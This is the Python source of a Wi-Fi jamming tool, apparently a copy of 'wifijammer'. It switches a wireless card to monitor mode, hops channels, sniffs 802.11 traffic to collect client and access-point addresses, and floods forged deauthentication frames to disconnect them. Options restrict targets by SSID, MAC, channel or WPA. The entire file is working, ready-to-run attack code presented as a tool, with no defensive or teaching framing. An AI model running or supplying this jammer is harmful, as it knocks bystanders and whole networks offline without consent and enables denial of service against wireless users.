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#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
nargs='*',
default=[],
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
nargs='*',
default=[],
help="Enter the SSID or MAC address of a specific access point to target")
parser.add_argument("-w",
"--wpa",
help="Only jam WPA/WPA2 networks",
action="store_true")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
parser.add_argument("-o",
"--nonoverlap",
help="Specify channel 1, 6, and 11 for N.American most common channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth(reason=2)
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth(reason=2)
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore += [addr.lower() for addr in skip]
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
# track bssid for essid
if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint:
args.accesspoint.add(pkt[Dot11].addr3.lower())
# bail if bssid is not in target list
if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]):
# pkt does not match our target list
return
if args.skip:
if pkt.addr2 in args.skip:
return
if args.wpa:
if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and (pkt[Dot11Elt].ID == 48 or (pkt[Dot11Elt].ID == 221 and pkt.info.startswith('\x00P\xf2\x01\x01\x00'))):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.nonoverlap else ['1', '6', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
args.skip = list(map(str.lower, args.skip))
# lowercase bssids while leaving essids intact
args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint)
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)